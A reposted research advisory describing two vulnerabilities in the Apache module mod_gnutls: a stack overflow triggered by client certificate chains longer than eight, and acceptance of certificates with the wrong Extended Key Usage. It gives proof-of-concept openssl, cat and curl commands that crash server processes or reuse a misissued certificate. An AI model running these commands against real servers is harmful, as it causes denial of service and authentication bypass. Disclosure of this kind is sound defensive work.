Close Menu
    Subscribe
    Alerts

    mod_gnutls Multiple Vulnerabilities – Research Advisory

    adminBy No Comments2 Mins Read


    Multiple vulnerabilities exist in mod_gnutls.

     

    CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing 

    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)

    A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain – the same certificate can be used multiple times.

     

    Proof of Concept: 

     

    The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0.

     

    1. The attacker generates a self-signed certificate:

    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj “/CN=self-signed-cert”

     

    Please note there are no particular requirements for the contents of this certificate.

     

    2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above:

    cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain.pem

     

    3. The attacker initiates an mTLS connection using the crafted certificate chain: 

    curl https:// -k –key key.pem –cert malicious-cert-chain.pem

     

    4. The following entry can be found in the /var/log/httpd/error_log file on the server:

    *** stack smashing detected ***: terminated

    […] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd

     

    The above confirms that the stack-based buffer overflow was detected and the protections kicked in: the process was aborted, and a core dump was generated. This largely reduces this vulnerability to a transient DoS, thanks to the hardening.

     

    This attack can be easily amplified by the attacker by making a number of requests:

    curl https:// https:// https:// https:// -k –key key.pem –cert malicious-cert-chain.pem

     

    This vulnerability can lead to a potential DoS through attacker-controlled CPU, memory and disk usage, despite the protections in place.

     

    CVE-2026-33308 Improper Certificate Validation

    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N (6.8)

    A client certificate with incorrect Extended Key Usage (EKU) is accepted. If the attackers compromise a certificate (with the associated private key) issued for a different purpose (e.g. server authentication), they may be able to reuse it for mTLS client authentication.

     

    Proof of Concept:

    The attacker makes a HTTPS request using a separately acquired private key and certificate chain:

    curl https:// -k –key key.pem –cert not-client-cert-chain.pem



    Source link

    Share.

    Related Posts

    Add A Comment

    Comments are closed.